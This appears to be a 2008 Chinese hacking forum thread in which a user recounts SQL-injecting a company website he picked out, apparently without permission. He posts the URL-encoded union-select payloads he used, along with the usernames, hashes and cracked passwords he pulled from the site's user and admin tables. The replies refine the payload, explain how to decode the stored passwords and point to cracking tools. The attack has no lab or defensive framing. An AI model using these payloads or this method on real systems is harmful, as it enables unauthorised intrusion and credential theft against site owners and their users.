标题:
[讨论]关于手动注入的问题 请高手来帮忙解决下
[打印本页]
作者:
valen886
时间:
2008-7-23 08:27
标题:
[讨论]关于手动注入的问题 请高手来帮忙解决下
[讨论]关于手动注入的问题 请高手来帮忙解决下
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
议题作者:哈破boy
这是关于SQL手动注入的一个问题
今天晚上, 我找了一个企业网站,通过命令and 1=1 和 and 1=2 发现了有注入漏洞
相继猜出字段数目是15,有两个表名 分别是 user 和 manage_User
可是,问题出在 在我猜用户和密码的时候 返回的用户:BlueM MD5密码是:49ba59abbe56e057 经解密:123456
在后台登陆时,密码错误. 前台登陆一样密码错误!
后来我用DOMIAN3.5来试了下 扫出user下有两个用户名 一个用户名是BlueM 对应MD5密码是:b51a468e87e07820 经解密:369258
另一个用户名是:xiaoyang 对应MD5密码是:49ba59abbe56e057 经解密:123456
manage_user下也有两个用户名: 一个用户名是:admin 密码是:2;;588<< 另一个用户是f77465g 密码是:586:,>erd
我用user下的两个用户登陆后台 提示帐户不存在或者密码错误, 在前台登陆帐户密码对了...我发现手动猜USER的时候密码用户怎么显示BlueM 而加密的密码是xiaoyang这个帐户的加密密码???
这是问题1
命令是: and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from user (回车)
and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示正常,页面显示 3>>4>>6)
and%201=2%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>49ba59abbe56e057>>6)
and%201=2%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>BlueM>>6)
为什么会出现这种情况??? 麻烦高手解答下
当用manage_user下的两个用户登陆后台时: 提示帐户不存在或者密码错误, 在前台登陆时也一样提示帐户不存在或者密码错误!为什么会这样?这是问题2
小弟先在这真心的感谢下回帖的人.永远为爱自己活者
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17
查看详细资料
TOP
您知道您年薪应是多少?
沉渊
晶莹剔透§烈日灼然
作者:
edchen
时间:
2008-7-23 08:27
and%201=2%20union%20select%201,2,username,password,5,6,7,8,9,10,11,12,13,14,15%20from%user
至于2个密码,第一个19813254,第二个有点不大对头,貌似是 4636'8^j[ ?Dreamless world……
帖子25 精华
0
积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30
查看详细资料
TOP
少女暴富的隐秘(图)
fucking
晶莹剔透§烈日灼然
作者:
slsam
时间:
2008-7-23 08:27
我觉得应该效验下数据库的真实性,我以前也经常遇到比如猜出了用户名密码,但是就是无法登陆(其实这种情况有很多说法,比如后台做了安全策略,限制了登陆IP点。。),其实好多管理员喜欢这样娱乐我们这些脚本小子啦。。。哈哈。。。
帖子28 精华
0
积分103 阅读权限40 性别男 在线时间124 小时 注册时间2007-8-19 最后登录2008-6-6
查看详细资料
TOP
软件项目外包
knlve
晶莹剔透§烈日灼然
作者:
史达比克
时间:
2008-7-23 08:27
后台可能是假的!‘.黒皕甡萿.…
帖子10 精华
0
积分37 阅读权限40 性别男 在线时间15 小时 注册时间2007-5-5 最后登录2008-2-13
查看详细资料
TOP
akens
晶莹剔透§烈日灼然
作者:
find-ok
时间:
2008-7-23 08:27
2;;588<<和586:,>erd 这两个密码也是被加密了的
有解这种密码的小工具
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21
查看详细资料
TOP
让女孩一夜变的更有女人味
hackest
运维管理组
作者:
B仔爱玉米
时间:
2008-7-23 08:27
D:\pass\decode>decode.exe
******************************************
欢迎使用此解密工具^_^
附件
pass.jpg
(38 KB)
2008-1-1 12:44
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
TOP
让女孩一夜变的更有女人味
哈破boy
晶莹剔透§烈日灼然
作者:
VBS
时间:
2008-7-23 08:27
老大 你这个 破密码的 软件能不能提供下啊永远为爱自己活者
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17
查看详细资料
TOP
让女孩一夜变的更有女人味
anki
晶莹剔透§烈日灼然
作者:
知了
时间:
2008-7-23 08:27
密码再解密下就好随风破解软件也可以破解。。呵呵
帖子34 精华
0
积分129 阅读权限40 性别男 在线时间12 小时 注册时间2007-1-25 最后登录2008-5-21
查看详细资料
TOP
icefox.eer
晶莹剔透§烈日灼然
作者:
M煲
时间:
2008-7-23 08:27
密文的ascii码减去密文所在位置,可以自己写解码的程序。
帖子1 精华
0
积分6 阅读权限40 性别男 在线时间0 小时 注册时间2007-5-9 最后登录2008-1-12
查看详细资料
TOP
哈破boy
晶莹剔透§烈日灼然
作者:
小斌斌
时间:
2008-7-23 08:27
引用:
引用第5楼hackest于2008-01-01 12:44发表的 :
D:passdecode>decode.exe
******************************************
欢迎使用此解密工具^_^ *
by:hackest[E.S.T] *
欢迎访问:
http://forum.eviloctal.com/
*
.......
还是找不到解这种密文的工具..... 又谁能帮下忙????永远为爱自己活者
帖子6 精华
0
积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17
查看详细资料
TOP
silenceshell
晶莹剔透§烈日灼然
作者:
剑花江南
时间:
2008-7-23 08:27
嗯...楼上的找到了给我分享一下,
我也经常遇到这个问题
hidehai@yeah.net
show more..
帖子35 精华
0
积分111 阅读权限40 在线时间65 小时 注册时间2007-6-22 最后登录2008-7-15
查看详细资料
TOP
awolf
晶莹剔透§烈日灼然
作者:
[TV]home
时间:
2008-7-23 08:27
加密算法貌似和雷池新闻系统的一样!
如果一样的话,你可以用这个试试!
http://bbs.awolf07.cn/viewthread.php?tid=107&extra=page%3D1
貌似一样的解法!
竟然这个真和雷池加密一样算法,看我解密结果:
帖子14 精华
0
积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22
查看详细资料
TOP
杀虫剂
晶莹剔透§烈日灼然
作者:
东莞大岭山
时间:
2008-7-23 08:27
hackest 用你在网上公布的代码编译了下,,密码解不出哦。
黎叔很生气
帖子70 精华
0
积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18
查看详细资料
TOP
awolf
晶莹剔透§烈日灼然
作者:
路上不塞车
时间:
2008-7-23 08:27
楼上的朋友试试我的工具。。。貌似和hackest的一样的原理,上次解密出来的结果一样的,只是我是vb的
帖子14 精华
0
积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22
查看详细资料
TOP
dongxuewuhen
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2